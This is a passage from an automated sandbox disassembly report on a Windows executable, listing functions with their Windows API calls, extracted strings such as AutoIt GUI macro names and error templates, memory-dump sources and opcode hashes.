                                                          • Opcode Fuzzy Hash: b204a037af0a5b73b5ca3c9e1a3a2917ee03731036b5633a6bcb484663ca77ad
                                                          • Instruction Fuzzy Hash: 6E81BEB11082459FDB10DF15C885BFA7BE8EF54714F04846AFDA58A0A2DB70DE4ACBA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: c2b5b66cbd743b3b669f0b65b5439d85c42ab0024a5e8b7e888cba01be1d1c18
                                                          • Instruction ID: 9d1240aa712924b60753d8af6b3a3a210a48f7cc1e1a87b74ccb0bead4be29dd
                                                          • Opcode Fuzzy Hash: c2b5b66cbd743b3b669f0b65b5439d85c42ab0024a5e8b7e888cba01be1d1c18
                                                          • Instruction Fuzzy Hash: E531C831A88209BFDB20FA60EE43EEE7774AF10715F200519F495710E1EF626F48E666
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00CD5013
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00CD501E
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00CD5029
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00CD5034
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00CD503F
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00CD504A
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00CD5055
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00CD5060
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00CD506B
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00CD5076
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00CD5081
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00CD508C
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00CD5097
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00CD50A2
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00CD50AD
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00CD50B8
                                                          • GetCursorInfo.USER32(?), ref: 00CD50C8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$Info
                                                          • String ID:
                                                          • API String ID: 2577412497-0
                                                          • Opcode ID: c40a831319f083d75a3231759b55f21ccc2b76073818c0b4f27229efa2913506
                                                          • Instruction ID: a8ecfe7cf5b008a1ad8a9f9a8a35c58e9ae06576403db460dc2facd96a018423
                                                          • Opcode Fuzzy Hash: c40a831319f083d75a3231759b55f21ccc2b76073818c0b4f27229efa2913506
                                                          • Instruction Fuzzy Hash: 4C3105B1D483196ADF109FB68C8995FBFE8FF04750F50452BA51DE7280DA79A5008F91
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CEA259
                                                          • DestroyWindow.USER32(?,?), ref: 00CEA2D3
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CEA34D
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CEA36F
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CEA382
                                                          • DestroyWindow.USER32(00000000), ref: 00CEA3A4
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C60000,00000000), ref: 00CEA3DB
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CEA3F4
                                                          • GetDesktopWindow.USER32 ref: 00CEA40D
                                                          • GetWindowRect.USER32(00000000), ref: 00CEA414
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CEA42C
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CEA444
                                                            • Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: e9652c80f400b2a14dd46933e0e5d0f2c45cbf7b6c1c276726ac51180fac60fd
                                                          • Instruction ID: cec8de75f3875046bbbcfb7275f0c7c610aef1204541dfdaf44d89cd6656c76a
                                                          • Opcode Fuzzy Hash: e9652c80f400b2a14dd46933e0e5d0f2c45cbf7b6c1c276726ac51180fac60fd
                                                          • Instruction Fuzzy Hash: AE718A70140285AFD721CF29DC49F6A7BE9FB88304F04452DF995DB2A0D7B4EA06CB62
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 00CEC627
                                                            • Part of subcall function 00CEAB37: ClientToScreen.USER32(?,?), ref: 00CEAB60
                                                            • Part of subcall function 00CEAB37: GetWindowRect.USER32(?,?), ref: 00CEABD6
                                                            • Part of subcall function 00CEAB37: PtInRect.USER32(?,?,00CEC014), ref: 00CEABE6
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CEC690
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CEC69B
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CEC6BE
                                                          • _wcscat.LIBCMT ref: 00CEC6EE
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CEC705
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00CEC71E
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CEC735
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00CEC757
                                                          • DragFinish.SHELL32(?), ref: 00CEC75E
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CEC851
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: ad88ba1ae982c1bec0d86f790a5eeadff4b00e43226baae73bb13d553fe0d309
                                                          • Instruction ID: 1c33cd60f22ba30aa60f3521fad60ff6eec477bd1efc1df13bb76a1a1fb9e97d
                                                          • Opcode Fuzzy Hash: ad88ba1ae982c1bec0d86f790a5eeadff4b00e43226baae73bb13d553fe0d309
                                                          • Instruction Fuzzy Hash: 81616C71108384AFC711DF64D8C5EAFBBF8EF98710F00092EF591961A1DB709A4ADB62
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00CE4424
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE446F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: 260cf70a0b4d1edb5a13753ea87afcdfa809dea778a0ce7dc1e0ebf32b56596f
                                                          • Instruction ID: c768a9064c29ee2085a48398bee432e80ff1d9fe96d494bfb8bafb2838bce23d
                                                          • Opcode Fuzzy Hash: 260cf70a0b4d1edb5a13753ea87afcdfa809dea778a0ce7dc1e0ebf32b56596f
                                                          • Instruction Fuzzy Hash: BB91A2742043419FCB18EF11C491AAEB7E5EF95354F14486CF8A65B3A2CB30ED4AEB91
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CEB8B4
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CE6B11,?), ref: 00CEB910
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CEB949
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CEB98C
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CEB9C3
                                                          • FreeLibrary.KERNEL32(?), ref: 00CEB9CF
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CEB9DF
                                                          • DestroyIcon.USER32(?), ref: 00CEB9EE
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CEBA0B
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CEBA17
                                                            • Part of subcall function 00C82EFD: __wcsicmp_l.LIBCMT ref: 00C82F86
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: 7c0540bf05ae4cb06c49b517245f1ef9c260aa48b478b16641b343af89ee2655
                                                          • Instruction ID: d4e91b5861cff5ae2d149a9641140f471fafb001d32f554eda71447eca9b6d6c
                                                          • Opcode Fuzzy Hash: 7c0540bf05ae4cb06c49b517245f1ef9c260aa48b478b16641b343af89ee2655
                                                          • Instruction Fuzzy Hash: CB61DC71900259BAEB24DF65CC85BBF7BBCEB08711F104119FA25DA1C1DB74AE81DBA0
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 00CCDCDC
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CCDCEC
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CCDCF8
                                                          • __wsplitpath.LIBCMT ref: 00CCDD56
                                                          • _wcscat.LIBCMT ref: 00CCDD6E
                                                          • _wcscat.LIBCMT ref: 00CCDD80
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CCDD95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDA9
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDDB
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDDFC
                                                          • _wcscpy.LIBCMT ref: 00CCDE08
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00CCDE47
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: daccf18353bba435393b5223441dd579d333ef7204505bf3804aab19e957ff97
                                                          • Instruction ID: ae8215115a1cfc6de8c85a70d8a21b387a96279219af735ca425dbd41441bd38
                                                          • Opcode Fuzzy Hash: daccf18353bba435393b5223441dd579d333ef7204505bf3804aab19e957ff97
                                                          • Instruction Fuzzy Hash: C0613E725042459FCB20EF60C885EAEB3E8FF89314F04492EF99A97251DB31EA45CB52
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CC9C7F
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CC9CA0
                                                          • __swprintf.LIBCMT ref: 00CC9CF9
                                                          • __swprintf.LIBCMT ref: 00CC9D12
                                                          • _wprintf.LIBCMT ref: 00CC9DB9
                                                          • _wprintf.LIBCMT ref: 00CC9DD7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 433e5bb7c665cd94f972e49c51777a752f4b3f983dd0167efaa7df4b137641ac
                                                          • Instruction ID: 0f551e65269c1a392ecc6ba6dddc218d4937626328abf9ad8deb80191628de5e
                                                          • Opcode Fuzzy Hash: 433e5bb7c665cd94f972e49c51777a752f4b3f983dd0167efaa7df4b137641ac
                                                          • Instruction Fuzzy Hash: 12516131900609BACF24EBE0DD86EEEB778EF14304F500569F506721A1EB312F5AEB65
                                                          APIs
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • CharLowerBuffW.USER32(?,?), ref: 00CCA3CB
                                                          • GetDriveTypeW.KERNEL32 ref: 00CCA418
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA460
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA497
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CCA4C5
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: 1e8c1f5d5ebf8b2502e4b7470bf20f630c34f72df6b6342faddc4912a5a74192
                                                          • Instruction ID: 841a23e83d4fdf4bffb4e3dcf3463beaf98b8157b1378a984111c80f8b2352ff
                                                          • Opcode Fuzzy Hash: 1e8c1f5d5ebf8b2502e4b7470bf20f630c34f72df6b6342faddc4912a5a74192
                                                          • Instruction Fuzzy Hash: 74515C71104305AFC714EF20C8D5D6AB3E8EF98758F10896DF896572A1DB31EE0ADB92
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C9E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00CBF8DF
                                                          • LoadStringW.USER32(00000000,?,00C9E029,00000001), ref: 00CBF8E8
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • GetModuleHandleW.KERNEL32(00000000,00D25310,?,00000FFF,?,?,00C9E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00CBF90A
                                                          • LoadStringW.USER32(00000000,?,00C9E029,00000001), ref: 00CBF90D
                                                          • __swprintf.LIBCMT ref: 00CBF95D
                                                          • __swprintf.LIBCMT ref: 00CBF96E
                                                          • _wprintf.LIBCMT ref: 00CBFA17
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CBFA2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: 8a87f7532725b3fa396989f12e4f9325cdc2bdb15e04306ab5f67acd53c621da
                                                          • Instruction ID: c725638bb61ae6acdef9cc1ccd2c8ae63bf29f612a19fc7f561cf66d60f3f663
                                                          • Opcode Fuzzy Hash: 8a87f7532725b3fa396989f12e4f9325cdc2bdb15e04306ab5f67acd53c621da
                                                          • Instruction Fuzzy Hash: 54411E7280420DBACF15FBE0DD86EEE7778AF14304F500569F505B6191EA316F4AEB61
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                          • String ID:
                                                          • API String ID: 884005220-0
                                                          • Opcode ID: 295a1ce99daf9d68c8eeaddf947b2ad713981ba212521aa0efaa1e69e45bc4fa
                                                          • Instruction ID: 19a66b1d0fccd9463d66c105c49e6d69c648ee635ad4335811bdce260c3245b3
                                                          • Opcode Fuzzy Hash: 295a1ce99daf9d68c8eeaddf947b2ad713981ba212521aa0efaa1e69e45bc4fa
                                                          • Instruction Fuzzy Hash: D761F372900302AFDF21AF64DD0A76977A4FF10725F224119E811E72D1EB38DA45DBE6
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CEBA56
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00CEBA6D
                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CEBA78
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CEBA85
                                                          • GlobalLock.KERNEL32(00000000), ref: 00CEBA8E
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CEBA9D
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00CEBAA6
                                                          • CloseHandle.KERNEL32(00000000), ref: 00CEBAAD
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CEBABE
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CF2CAC,?), ref: 00CEBAD7
                                                          • GlobalFree.KERNEL32(00000000), ref: 00CEBAE7
                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CEBB0B
                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00CEBB36
                                                          • DeleteObject.GDI32(00000000), ref: 00CEBB5E
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CEBB74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: c4e5a902d6304989630962c1c2cee6ec72b3fdb3367186dee03c8d5e5c0bfe53
                                                          • Instruction ID: eb31bb13f07901dd0c4347baf1a0bf0414badf93d7019d0bae5687ca6c01bb9c
                                                          • Opcode Fuzzy Hash: c4e5a902d6304989630962c1c2cee6ec72b3fdb3367186dee03c8d5e5c0bfe53
                                                          • Instruction Fuzzy Hash: 80410875600249EFDB119F66DC88FAFBBB9EB89711F108068F915DB260D7709E02DB60
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 00CCDA10
                                                          • _wcscat.LIBCMT ref: 00CCDA28
                                                          • _wcscat.LIBCMT ref: 00CCDA3A
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CCDA4F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDA63
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00CCDA7B
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CCDA95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCDAA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: 442af5944e20122cfee247955dc76311af054e9979973b30457a78bd8c61b7f7
                                                          • Instruction ID: abb869567d4e267c64138357d14a8830cad9b341a9cd892564b85c04397d19f3
                                                          • Opcode Fuzzy Hash: 442af5944e20122cfee247955dc76311af054e9979973b30457a78bd8c61b7f7
